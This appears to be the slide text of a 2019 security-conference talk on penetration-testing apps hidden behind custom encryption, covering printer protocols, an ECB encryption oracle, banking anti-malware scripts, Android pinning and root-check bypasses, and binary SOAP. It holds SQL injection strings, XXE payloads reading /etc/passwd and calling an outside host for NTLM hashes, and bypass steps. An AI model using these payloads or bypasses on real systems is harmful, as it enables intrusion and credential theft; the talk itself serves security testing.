When it comes to thick-clients, java applets, embedded devices or mobile apps - often, the idea is to forget about HTTP/S stack, plaintext POST parameters, and instead, implement a custom communication protocol. - Sending files for printing? Caesar cipher does not support full UTF-8, so use AES in ECB mode. - Malware attacking online banking? Even over HTTPS, double-encrypt POST parameters. If your clients are rich, use asymetric encryption, for better protection. - Planning SOAP WS? Use WCF Binary XML and put it in a START-TLS tunnel wrapped over a TCP connection. Welcome to the world of application/x-inception-data content types, <meta charset=obscure> encoding and custom cryptography. Ideas that usually implement methods of 'security by obscurity'. Once the outer layer of obfuscation is off, very often the server backend reveals simple access control issues, SQL query shells or code execution vulnerabilities. I will discuss real-world examples from enterprise solutions tests which require a bit more effort to allow tampering with data send from the client: - intercepting the traffic, bypassing NAC - decapsulating encryption and encoding layers - hooking into function calls, modifying packages - reverse-engineer proprietary protocols and encryption.

1. We need to go deeper
Testing inception apps
Jakub Kaluzny
CONFidence, June 2019

2. DevSecOps
B64:
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
DAST scanner in
CI/CD pipeline
SQLi
Is it fixed?
Base64_decode(„YWJjCg==’ OR 1=1”)

3. JAKUB KALUZNY
• 10 years in IT & Security
• Threat modeling,
DevSecOps, penetration
tests
• Poland, Spain, Australia
• banking, fintech, law, airline,
entertainment, e-commerce
• Speaker at BlackHat,
HackInTheBox, ZeroNights
Who

4. What is this all about?
HTTP
username=admin&password=abc
HTTP
username=admin&password=abc
SSL
Wireshark

5. Protection against what?
Sniffing, Man-in-The-Middle
SQL Injection, cross-user access control, business logic

6. What is this all about?
dXNlcm5hbWUK=YWRtaW4K&c
GFzc3dvcmQK=YWJjCg%3d%3d
HTTP
username=admin&password=abc
HTTP
HTTP
username=admin&password=abc
SSL
SSL
Local HTTP proxy
Custom script
Wireshark

7. Inception apps
AES encrypted:
c6fa10bd98a6c4e778eac
Binary
protocol
SSL
Key exchange
during activation
Mobile app – obfuscated
Emulator and root/jailbreak detection

8. • Raising the bar:
• For attackers?
• For testers?
• Money:
• Scoping a test?
• Risk
• Attack surface coverage?
• Security level?
Why?

9. • Technical examples
• Business consequences
• And discuss pentesting processes in general
What

10. LET’S GET TO IT

11. Example 1
Enterprise printers – Pull Printing
PRINTERWORKSTATION
PRINT SERVER
https://www.slideshare.net/wojdwo/hitb-kaluzny-final

12. In the middle of printers

13. Printers down under – AES

14. • JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
Hidden gem – SD card

15. Example 1 – decompiled JAR

16. • JAR on the SD card
• Encryption mechanism in the JAR
• Hardcoded static symmetric key - AES
• It’s the same everywhere!
• No remote firmware update!
Example 1

18. Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Get the SD card Extract the key
Apply
decryption

19. In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode

20. ECB encryption mode for PostScript files
Each block encrypted separately
ECB is bad
https://en.wikipedia.org/wiki/ECB_mode

21. In the middle of printers - revisited
S
E
R
V
E
R
P
R
I
N
T
E
R
constant 263B
96B, “X” B, 128B
always different 64 B
many identical 16B blocks
HELLO
HELLO, CERTIFICATE
SESSION KEY
PostScript, ECB mode

22. Attack flow
Threat
actor
Crown
jewels
Sniff the communication
Communication
analysis
Decryption
script
Data extraction
Access to plaintext files, no access control

23. MORE

24. Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50

25. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string
magic_string=b0dc782f6bd9
acce9bc3e9c8317b05125bb51
d9cbc4bfa56d41d7db1489f9b
bcc2cc45f774773e8adde9c41
ecd62c5bc1faafa1d2553661c
8b83012f7e968d511b3215b77
64e11fbff4c1db3aa7325e479
b31f1313d3c7bf78585f77f3f
17dc69bb9650a3bfb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3
magic_string=b0dc782f6bd9
acce9bc3e9c8317bb6e9137e2
18c7267da6a57fcd28cc9074b
00374cc42f224dd3’ OR 1=1

26. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
11b3215b7764e11fbff4c1db3aa73925
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50

27. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaaaaaaaaa
aaaaaa, your
price is 1500.50

28. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…
Hi
aaaaaaaaaaaaaa
aKaluznyaaaaaa
aaaaaaaaaaa,
your price is
1500.50

29. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „Kaluznyaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
5e8c96910f00f0c13fd5a402877d01ec „aaaaaaaaaaaaaaa&”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =Kaluznyaaaaaaaaaaaaaaa…

30. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
a3c87d6b3905a779a5f1023bdf04ad2a „aluznyaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „aaaaaaaaaaaaaa&i”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aluznyaaaaaaaaaaaaaaa…

31. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
b1210bb98863ba5cd874014fb19fae70 „luznyaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
6334547c4ba2df81296b72e38a5309d8 „aaaaaaaaaaaaa&ip”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =luznyaaaaaaaaaaaaaaa…

32. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5abfcd17d58fe4136232bfd7a1533f93 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
880c5f38a4cfa7e003fe5f316294fe28 „aaaaa&ip=X.Y.Z.A”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…

33. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
5655d4c01446a7aeb104cf298fe6b613 „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
1fa9f4fb1104af1afecd980bec3c8536 „&ip=X.Y.Z.A&user”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaa…

34. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
a57fcd28cc90574b00374cc42f224dd3
Magic string, name =aaaaaaaaaaaaaaa…

35. b0dc782f6bd9acce9bc3e9c8317b0512
5bb51d9cbc4bfa56d41d7db1489f9bbc
c2cc45f774773e48adde9c41ecd62c5b
c1faafa1d2553661c8b83012f7e968d5
179762d5bba72ce4700aad2a96f5121d „aaaaaaaaaaaaaaaa”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
e479b31f1313d3c7bf78585f77f3f17d „aaaaaaaaaaaaaaaa”
c69bb9650a3bfb6e9137e218c7267da6 „X.Y.Z.A&user=adm”
Encryption Oracle
Hi
Kaluznyaaaaaaa
aaaaaaaaaaaaaa
aaaaaaX.Y.Z.A,
your price is
1500.50

36. B0dc782f6bd9acce9bc3e9c8317b0512 „action=buy&item”
5bb51d9cbc4bfa56d41d7db1489f9bbc „=137&price=1500”
c2cc45f774773e48adde9c41ecd62c5b „.50&name=Kaluzn”
c1faafa1d2553661c8b83012f7e968d5 „y&ip=X.Y.Z.A&us”
179762d5bba72ce4700aad2a96f5121d „er=admin&passwo”
e479b31f1313d3c7bf78585f77f3f17d „rd=s3cr3t&path=”
Encryption Oracle
031531894944dd25e457746a02f7eacf „&arbitrary=asd&&”
820cb29708da08d81cd8dd2ee1c459ed „chg=a&....&chg=b”

37. Web app, AES comms, no key access
HTTP
Action=buy&Product=137&name=Kaluzny
HTTP
magic_string=abcdef1234567890…
HTTP
magic_string=abcdef1234567890…
HTTP
msg=Hi%20Kaluzny&Price_for_you=1500.50
API

38. Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Communication
analysis
Encryption
oracle
Lateral
movement
Credentials would never be sent unencrypted

39. MITB MALWARE
DETECTION IN
JAVASCRIPT

40. MiTB malware - WebInjects
<title>Bank</title>
…
Password:
<input type=text>
<script src=//malware>
<title>Bank</title>
…
Password:
<input type=text>

41. MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…

42. JS-based MiTB malware detection
MiTB malware detection in JavaScript
eval
Obfuscation – base64, hex
RSA
encryption
signatures
reasoning engine
Web Service
rsa public key
https://www.slideshare.net/wojdwo/bypassing-malware-detection-mechanisms-in-online-banking-confidence
@molejarka, @j_kaluzny

43. Attack flow
Threat
actor
Crown
jewels
Tamper with parameters
Deobfuscate JS Extract RSA keys
Decrypt
communication

44. MiTB malware detection in JS
<script
src=//antimalware>
<script src=//malware>
<title>Bank</title>
…

45. TESTING MOBILE
BANKING IN 2019

46. Mobile banking in early 2010s
OK
Hi, I want to send $5
Standard SSL

47. Attack flow – Android – inception level 1
Threat
actor
Crown
jewels
Tamper with parameters
Add local proxy CA

48. • Export CA from local proxy
• Push it to the device
• Intercept traffic
Androd – inception level 1

49. Mobile banking in early 2010s
OK
Hi, I want to send $5
SSL pinning

50. Modifying a hardcoded certificate:
• Unpack APK
• Change certificate in resources
• Pack the app, sign it
Attack flow – inception level 2

51. Attack flow – inception level 2
Threat
actor
Crown
jewels
Tamper with parameters
Bypass hardcoded
SSL pinning checks
Set the proxy

52. • Decompile APK to Smali code
• „Void” the pinning methods or
change the certificate:
• Find the interesting
methods
• Delete the code, leaving
„return-void” at the end
• Build it, sign it
Attack flow – inception level 2

53. Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
HTTP body encryption

54. HTTP body encryption
payload=e47bf2dcd90af0d3366f
4bacfe932ffae47bf2dcd90af0d33
SSL
HTTP

55. Testing mobile banking in late 2010s, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption

56. Attack flow – Android – 7 layers of inception
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin

57. • Decompile APK to Smali code
• „Void” the integrity checks
Attack flow – Android – inception level 1/7

58. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• Second root check runs a minute after the first!
Attack flow – Android – inception level 2/7

59. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
Attack flow – Android – inception level 3/7

60. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
Attack flow – Android – inception level 4/7

61. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
Attack flow – Android – inception level 5/7

62. Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
OK, let’s set a key for future encryption
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption

63. Example 4 – mobile banking in 2019, Poland
1c45a9eef01775077dac93add52595
The key will be 0000000000
Hi, I want to pair a mobile app
e81129f01a5072bad84aaaf8bcc51436
SSL pinning
Encrypted
storage
APK/IPA
integrity
Emulator
detection
Root/jb
detection HTTP body encryption

64. • Decompile APK to Smali code
• „Void” the integrity checks
• „Void” the root checks
• „Void” the emulator detection
• Bypass SSL pinning
• Make encryption key „static”
• Develop a custom Burp plugin
Attack flow – Android – inception level 6/7

65. Burp plugin – „Deszyfrator”
@slawekja

66. Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing

67. SOAP – Simple Object Access Protocol
WCF BINARY XML - SOAP
TCP
START-TLS
Let’s call it tnSOAP – totally not SOAP

68. mitm_relay for START-TLS
[thick client] ----▶ [mitm_relay] ----▶ [destination server]
| ▲
▼ |
[local proxy] < Intercept and
| ▲ modify traffic here
▼ |
[dummy webserver]
https://github.com/jrmdev/mitm_relay

69. WCF data – python-wcfbin by ERNW
[jk@omega python-wcfbin-develop]$ python xml2wcf.py | hexdump -Cv
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
xmlns:m="http://www.example.org">
<soap:Header>
</soap:Header>
<soap:Body>
<m:GetStockPrice>
<m:StockName>GOOG</m:StockName>
</m:GetStockPrice>
</soap:Body>
</soap:Envelope>
00000000 43 04 73 6f 61 70 02 0b 04 73 6f 61 70 04 09 01 |C.soap...soap...|
00000010 6d 16 68 74 74 70 3a 2f 2f 77 77 77 2e 65 78 61 |m.http://www.exa|
00000020 6d 70 6c 65 2e 6f 72 67 43 04 73 6f 61 70 08 01 |mple.orgC.soap..|
00000030 43 04 73 6f 61 70 0e 6a 0d 47 65 74 53 74 6f 63 |C.soap.j.GetStoc|
00000040 6b 50 72 69 63 65 6a 09 53 74 6f 63 6b 4e 61 6d |kPricej.StockNam|
00000050 65 9f 03 18 e3 86 01 01 01 |e........|
00000059

70. Attack flow – tnSOAP
Threat
actor
Crown
jewels
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes

71. • <!ENTITY xxe SYSTEM „file:///etc/passwd”>
• XXE OOB over FTP
• <!ENTITY „abc” SYSTEM „file://securing.biz:445/”>
TCP -> START TLS -> WCF -> XML -> XXE -> NTLM
https://techblog.mediaservice.net/2018/02/from-xml-external-entity-to-ntlm-domain-hashes/

72. Attack flow – tnSOAP
Threat
actor
Increased
attack
surface
Tamper with parameters
Intercept TCP
connection
MiTM on START-TLS Decapsulate WCF
Hardware
+ socat
mitm_relay python-wcfbin
+ few fixes

73. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Processes

74. Attack flow – Android – inception level 7/7
Threat
actor
Crown
jewels
Tamper with parameters
Bypass integrity
checks
Bypass root
detection
Make encryption
static
Bypass SSL pinning
Bypass emulator
detection
Develop Burp plugin
You are in position
to start testing

75. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary

76. Protection against what?
Sniffing, Man-in-The-Middle, Malware
SQL Injection, cross-user access control, business logic

77. • Not a surprise that there are vulnerabilties
• Let’s talk about corporate processes:
• How penetration tests are organised?
• During which phase you realise it’s an inception
app?
• What is the cost of implementing inception?
• What is the security advantage of inception?
• What is the cost of testing an inception app?
• How to optimise it?
Summary

78. Thank you!
Twitter: @j_kaluzny
Jakub.Kaluzny@securing.biz
MORE THAN
SECURITY TESTS.